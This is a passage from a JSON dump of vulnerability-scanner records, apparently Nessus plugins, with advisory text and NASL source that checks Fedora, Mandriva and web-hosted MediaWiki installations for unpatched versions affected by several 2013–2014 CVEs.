if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed versions : 1.19.18 / 1.22.9 / 1.23.2' +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:48:45", "description": "This is a major update from the 1.21 branch to the 1.23 long term support branch.\n\n - (bug 68187) SECURITY: Prepend jsonp callback with comment. - CVE-2014-5241\n\n - (bug 66608) SECURITY: Fix for XSS issue in bug 66608:\n Generate the URL used for loading a new page in JavaScript,instead of relying on the URL in the link that has been clicked. - CVE-2014-5242\n\n - (bug 65778) SECURITY: Copy prevent-clickjacking between OutputPage and ParserOutput. - CVE-2014-5243\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-08-27T00:00:00", "type": "nessus", "title": "Fedora 20 : mediawiki-1.23.2-1.fc20 (2014-9583)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5241", "CVE-2014-5242", "CVE-2014-5243"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:mediawiki", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-9583.NASL", "href": "https://www.tenable.com/plugins/nessus/77400", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-9583.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77400);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-5241\", \"CVE-2014-5242\", \"CVE-2014-5243\");\n script_bugtraq_id(69135, 69136, 69137);\n script_xref(name:\"FEDORA\", value:\"2014-9583\");\n\n script_name(english:\"Fedora 20 : mediawiki-1.23.2-1.fc20 (2014-9583)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is a major update from the 1.21 branch to the 1.23 long term\nsupport branch.\n\n - (bug 68187) SECURITY: Prepend jsonp callback with\n comment. - CVE-2014-5241\n\n - (bug 66608) SECURITY: Fix for XSS issue in bug 66608:\n Generate the URL used for loading a new page in\n JavaScript,instead of relying on the URL in the link\n that has been clicked. - CVE-2014-5242\n\n - (bug 65778) SECURITY: Copy prevent-clickjacking\n between OutputPage and ParserOutput. - CVE-2014-5243\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1125111\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-August/137052.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?23df0420\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mediawiki package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mediawiki\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"mediawiki-1.23.2-1.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mediawiki\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:48:45", "description": "This is a major update from the 1.21 branch to the 1.23 long term support branch.\n\n - (bug 68187) SECURITY: Prepend jsonp callback with comment. - CVE-2014-5241\n\n - (bug 66608) SECURITY: Fix for XSS issue in bug 66608:\n Generate the URL used for loading a new page in JavaScript,instead of relying on the URL in the link that has been clicked. - CVE-2014-5242\n\n - (bug 65778) SECURITY: Copy prevent-clickjacking between OutputPage and ParserOutput. - CVE-2014-5243\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-08-27T00:00:00", "type": "nessus", "title": "Fedora 19 : mediawiki-1.23.2-1.fc19 (2014-9548)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5241", "CVE-2014-5242", "CVE-2014-5243"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:mediawiki", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2014-9548.NASL", "href": "https://www.tenable.com/plugins/nessus/77398", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-9548.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77398);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-5241\", \"CVE-2014-5242\", \"CVE-2014-5243\");\n script_bugtraq_id(69135, 69136, 69137);\n script_xref(name:\"FEDORA\", value:\"2014-9548\");\n\n script_name(english:\"Fedora 19 : mediawiki-1.23.2-1.fc19 (2014-9548)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is a major update from the 1.21 branch to the 1.23 long term\nsupport branch.\n\n - (bug 68187) SECURITY: Prepend jsonp callback with\n comment. - CVE-2014-5241\n\n - (bug 66608) SECURITY: Fix for XSS issue in bug 66608:\n Generate the URL used for loading a new page in\n JavaScript,instead of relying on the URL in the link\n that has been clicked. - CVE-2014-5242\n\n - (bug 65778) SECURITY: Copy prevent-clickjacking\n between OutputPage and ParserOutput. - CVE-2014-5243\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1125111\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-August/137048.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8c3be14b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mediawiki package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mediawiki\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"mediawiki-1.23.2-1.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mediawiki\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-16T14:02:15", "description": "Updated mediawiki packages fix multiple vulnerabilities :\n\nMediaWiki user Michael M reported that the fix for CVE-2013-4568 allowed insertion of escaped CSS values which could pass the CSS validation checks, resulting in XSS (CVE-2013-6451).\n\nChris from RationalWiki reported that SVG files could be uploaded that include external stylesheets, which could lead to XSS when an XSL was used to include JavaScript (CVE-2013-6452).\n\nDuring internal review, it was discovered that MediaWiki's SVG sanitization could be bypassed when the XML was considered invalid (CVE-2013-6453).\n\nDuring internal review, it was discovered that MediaWiki displayed some information about deleted pages in the log API, enhanced RecentChanges, and user watchlists (CVE-2013-6472).\n\nNetanel Rubin from Check Point discovered a remote code execution vulnerability in MediaWiki's thumbnail generation for DjVu files.\nInternal review also discovered similar logic in the PdfHandler extension, which could be exploited in a similar way (CVE-2014-1610).\n\nMediaWiki before 1.22.3 does not block unsafe namespaces, such as a W3C XHTML namespace, in uploaded SVG files. Some client software may use these namespaces in a way that results in XSS. This was fixed by disallowing uploading SVG files using non-whitelisted namespaces (CVE-2014-2242).\n\nMediaWiki before 1.22.3 performs token comparison that may be vulnerable to timing attacks. This was fixed by making token comparison use constant time (CVE-2014-2243).\n\nMediaWiki before 1.22.3 could allow an attacker to perform XSS attacks, due to flaw with link handling in api.php. This was fixed such that it won't find links in the middle of api.php links (CVE-2014-2244).\n\nMediaWiki has been updated to version 1.22.3, which fixes these issues, as well as several others.\n\nAlso, the mediawiki-ldapauthentication and mediawiki-math extensions have been updated to newer versions that are compatible with MediaWiki 1.22.\n\nAdditionally, the mediawiki-graphviz extension has been obsoleted, due to the fact that it is unmaintained upstream and is vulnerable to cross-site scripting attacks.\n\nNote: if you were using the instances feature in these packages to support multiple wiki instances, this feature has now been removed.\nYou will need to maintain separate wiki instances manually.", "cvss3": {"score": null, "vector": null}, "published": "2014-03-14T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : mediawiki (MDVSA-2014:057)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4568", "CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2242", "CVE-2014-2243", "CVE-2014-2244"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:mediawiki", "p-cpe:/a:mandriva:linux:mediawiki-ldapauthentication", "p-cpe:/a:mandriva:linux:mediawiki-mysql", "p-cpe:/a:mandriva:linux:mediawiki-pgsql", "p-cpe:/a:mandriva:linux:mediawiki-sqlite", "cpe:/o:mandriva:business_server:1"], "id": "MANDRIVA_MDVSA-2014-057.NASL", "href": "https://www.tenable.com/plugins/nessus/73004", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:057. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73004);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-6451\", \"CVE-2013-6452\", \"CVE-2013-6453\", \"CVE-2013-6472\", \"CVE-2014-1610\", \"CVE-2014-2242\", \"CVE-2014-2243\", \"CVE-2014-2244\");\n script_bugtraq_id(65003, 65223, 65883, 65906, 65910);\n script_xref(name:\"MDVSA\", value:\"2014:057\");\n\n script_name(english:\"Mandriva Linux Security Advisory : mediawiki (MDVSA-2014:057)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated mediawiki packages fix multiple vulnerabilities :\n\nMediaWiki user Michael M reported that the fix for CVE-2013-4568\nallowed insertion of escaped CSS values which could pass the CSS\nvalidation checks, resulting in XSS (CVE-2013-6451).\n\nChris from RationalWiki reported that SVG files could be uploaded that\ninclude external stylesheets, which could lead to XSS when an XSL was\nused to include JavaScript (CVE-2013-6452).\n\nDuring internal review, it was discovered that MediaWiki's SVG\nsanitization could be bypassed when the XML was considered invalid\n(CVE-2013-6453).\n\nDuring internal review, it was discovered that MediaWiki displayed\nsome information about deleted pages in the log API, enhanced\nRecentChanges, and user watchlists (CVE-2013-6472).\n\nNetanel Rubin from Check Point discovered a remote code execution\nvulnerability in MediaWiki's thumbnail generation for DjVu files.\nInternal review also discovered similar logic in the PdfHandler\nextension, which could be exploited in a similar way (CVE-2014-1610).\n\nMediaWiki before 1.22.3 does not block unsafe namespaces, such as a\nW3C XHTML namespace, in uploaded SVG files. Some client software may\nuse these namespaces in a way that results in XSS. This was fixed by\ndisallowing uploading SVG files using non-whitelisted namespaces\n(CVE-2014-2242).\n\nMediaWiki before 1.22.3 performs token comparison that may be\nvulnerable to timing attacks. This was fixed by making token\ncomparison use constant time (CVE-2014-2243).\n\nMediaWiki before 1.22.3 could allow an attacker to perform XSS\nattacks, due to flaw with link handling in api.php. This was fixed\nsuch that it won't find links in the middle of api.php links\n(CVE-2014-2244).\n\nMediaWiki has been updated to version 1.22.3, which fixes these\nissues, as well as several others.\n\nAlso, the mediawiki-ldapauthentication and mediawiki-math extensions\nhave been updated to newer versions that are compatible with MediaWiki\n1.22.\n\nAdditionally, the mediawiki-graphviz extension has been obsoleted, due\nto the fact that it is unmaintained upstream and is vulnerable to\ncross-site scripting attacks.\n\nNote: if you were using the instances feature in these packages to\nsupport multiple wiki instances, this feature has now been removed.\nYou will need to maintain separate wiki instances manually.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0113.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0124.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"MediaWiki thumb.php page Parameter Remote Shell Command Injection\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MediaWiki Thumb.php Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mediawiki\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mediawiki-ldapauthentication\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mediawiki-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mediawiki-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mediawiki-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"mediawiki-1.22.3-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"mediawiki-ldapauthentication-2.0f-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"mediawiki-mysql-1.22.3-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"mediawiki-pgsql-1.22.3-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"mediawiki-sqlite-1.22.3-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-16T14:02:00", "description": "According to its version number, the instance of MediaWiki running on the remote host is affected by the following vulnerabilities :\n\n - Escape sequences are not properly sanitized when passed to the 'Sanitizer::checkCss' class, which allows a remote attacker to conduct cross-site scripting attacks.\n (CVE-2013-6451)\n\n - An input validation error exists in the 'XmlTypeCheck.php' script in uploaded SVG files that contain external style sheets, which allows a remote attacker to conduct cross-site scripting attacks.\n (CVE-2013-6452)\n\n - Input validation by the checkSvgScriptCallback() function is bypassed in the 'UploadBase.php' script when an SVG file with invalid XML is uploaded. This can result in malicious code execution. (CVE-2013-6453)\n\n - An input validation error exists in the 'Sanitizer.php' script when input is submitted to the '-o-link' attribute, which allows cross-site scripting attacks in Opera 12. (CVE-2013-6454)\n\n - An information disclosure vulnerability exists in the log API, Enhanced Recent Changes feature, and users' watchlists that allows deleted log entries to be viewed.\n (CVE-2013-6472)\n\nAdditionally, the following extensions contain vulnerabilities but are not enabled or installed by default (unless otherwise noted) :\n\n - The TimedMediaHandler extension is affected by a cross-site scripting vulnerability due to the lack of input validation of the 'data-videopayload' attribute in the 'mw.PopUpThumbVideo.js' script. (CVE-2013-4574)\n\n - The Scribuntu extension is affected by a NULL pointer dereference and buffer overflow flaw in the implementation of the 'luasandbox' PHP extension that can lead to a denial of service or arbitrary code execution. (CVE-2013-4570, CVE-2013-4571)\n\n - The CentralAuth extension is affected by an information disclosure vulnerability due to the insertion of a username into the page's DOM. (CVE-2013-6455)\n\n - The Semantic Forms extension is affected by a cross-site request forgery (XSRF) vulnerability due to the lack of token validation in the 'Special:CreateCategory' page.\n (CVE-2014-3454)\n\nNote that Nessus has not tested for these issues but has instead relied on the application's self-reported version number.", "cvss3": {"score": null, "vector": null}, "published": "2014-02-06T00:00:00", "type": "nessus", "title": "MediaWiki < 1.19.10 / 1.21.4 / 1.22.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4570", "CVE-2013-4571", "CVE-2013-4574", "CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6455", "CVE-2013-6472", "CVE-2014-3454"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:mediawiki:mediawiki"], "id": "MEDIAWIKI_1_19_10.NASL", "href": "https://www.tenable.com/plugins/nessus/72370", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72370);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2013-4570\",\n \"CVE-2013-4571\",\n \"CVE-2013-4574\",\n \"CVE-2013-6451\",\n \"CVE-2013-6452\",\n \"CVE-2013-6453\",\n \"CVE-2013-6454\",\n \"CVE-2013-6455\",\n \"CVE-2013-6472\",\n \"CVE-2014-3454\"\n );\n script_bugtraq_id(64966, 65003, 67522);\n\n script_name(english:\"MediaWiki < 1.19.10 / 1.21.4 / 1.22.1 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains an application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the instance of MediaWiki running on\nthe remote host is affected by the following vulnerabilities :\n\n - Escape sequences are not properly sanitized when passed\n to the 'Sanitizer::checkCss' class, which allows a\n remote attacker to conduct cross-site scripting attacks.\n (CVE-2013-6451)\n\n - An input validation error exists in the\n 'XmlTypeCheck.php' script in uploaded SVG files that\n contain external style sheets, which allows a remote\n attacker to conduct cross-site scripting attacks.\n (CVE-2013-6452)\n\n - Input validation by the checkSvgScriptCallback()\n function is bypassed in the 'UploadBase.php' script\n when an SVG file with invalid XML is uploaded. This\n can result in malicious code execution. (CVE-2013-6453)\n\n - An input validation error exists in the 'Sanitizer.php'\n script when input is submitted to the '-o-link'\n attribute, which allows cross-site scripting attacks in\n Opera 12. (CVE-2013-6454)\n\n - An information disclosure vulnerability exists in the\n log API, Enhanced Recent Changes feature, and users'\n watchlists that allows deleted log entries to be viewed.\n (CVE-2013-6472)\n\nAdditionally, the following extensions contain vulnerabilities but\nare not enabled or installed by default (unless otherwise noted) :\n\n - The TimedMediaHandler extension is affected by a\n cross-site scripting vulnerability due to the lack of\n input validation of the 'data-videopayload' attribute\n in the 'mw.PopUpThumbVideo.js' script. (CVE-2013-4574)\n\n - The Scribuntu extension is affected by a NULL pointer\n dereference and buffer overflow flaw in the\n implementation of the 'luasandbox' PHP extension that\n can lead to a denial of service or arbitrary code\n execution. (CVE-2013-4570, CVE-2013-4571)\n\n - The CentralAuth extension is affected by an information\n disclosure vulnerability due to the insertion of a\n username into the page's DOM. (CVE-2013-6455)\n\n - The Semantic Forms extension is affected by a cross-site\n request forgery (XSRF) vulnerability due to the lack of\n token validation in the 'Special:CreateCategory' page.\n (CVE-2014-3454)\n\nNote that Nessus has not tested for these issues but has instead\nrelied on the application's self-reported version number.\");\n # https://lists.wikimedia.org/pipermail/mediawiki-announce/2014-January/000138.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?11acd3f1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.19#MediaWiki_1.19.10\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.20#MediaWiki_1.21.4\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mediawiki.org/wiki/Release_notes/1.22#MediaWiki_1.22.1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MediaWiki version 1.19.10 / 1.21.4 / 1.22.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-6453\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/06/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/06\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mediawiki:mediawiki\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mediawiki_detect.nasl\");\n script_require_keys(\"Settings/ParanoidReport\", \"installed_sw/MediaWiki\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"MediaWiki\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\nversion = install['version'];\ninstall_url = build_url(qs:install['path'], port:port);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nif (\n version =~ \"^1\\.19\\.[0-9]([^0-9]|$)\" ||\n version =~ \"^1\\.21\\.[0-3]([^0-9]|$)\" ||\n version =~ \"^1\\.22\\.[0]([^0-9]|$)\"\n)\n{\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n set_kb_item(name:'www/'+port+'/XSRF', value:TRUE);\n\n if 